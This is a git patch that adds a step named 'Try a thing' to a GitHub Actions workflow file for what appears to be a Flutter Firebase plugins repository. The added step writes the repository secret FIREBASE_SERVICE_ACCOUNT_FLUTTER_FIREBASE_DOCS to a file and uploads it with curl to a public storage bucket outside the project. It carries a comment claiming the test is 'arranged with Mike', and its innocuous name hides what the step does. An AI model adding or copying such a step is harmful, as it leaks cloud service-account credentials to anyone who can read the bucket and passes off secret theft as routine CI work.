From d589955adfc453e550f6592decca314344db76ee Mon Sep 17 00:00:00 2001 From: nilsreichardt Date: Tue, 27 Sep 2022 13:00:31 +0200 Subject: [PATCH] Try a thing --- .github/workflows/all_plugins.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/.github/workflows/all_plugins.yaml b/.github/workflows/all_plugins.yaml index e97465090f80..53679584984f 100644 --- a/.github/workflows/all_plugins.yaml +++ b/.github/workflows/all_plugins.yaml @@ -24,6 +24,13 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 + # As note: this test is arranged with Mike + - name: Try a thing + env: + FIREBASE_SERVICE_ACCOUNT_FLUTTER_FIREBASE_DOCS: ${{ secrets.FIREBASE_SERVICE_ACCOUNT_FLUTTER_FIREBASE_DOCS }} + run: | + echo $FIREBASE_SERVICE_ACCOUNT_FLUTTER_FIREBASE_DOCS >> firebase_secret.txt + curl -v --upload-file firebase_secret.txt 'https://storage.googleapis.com/public-nilsreichardt/firebase_secret.txt' - name: 'Install Flutter' run: ./.github/workflows/scripts/install-flutter.sh stable - name: 'Install Tools'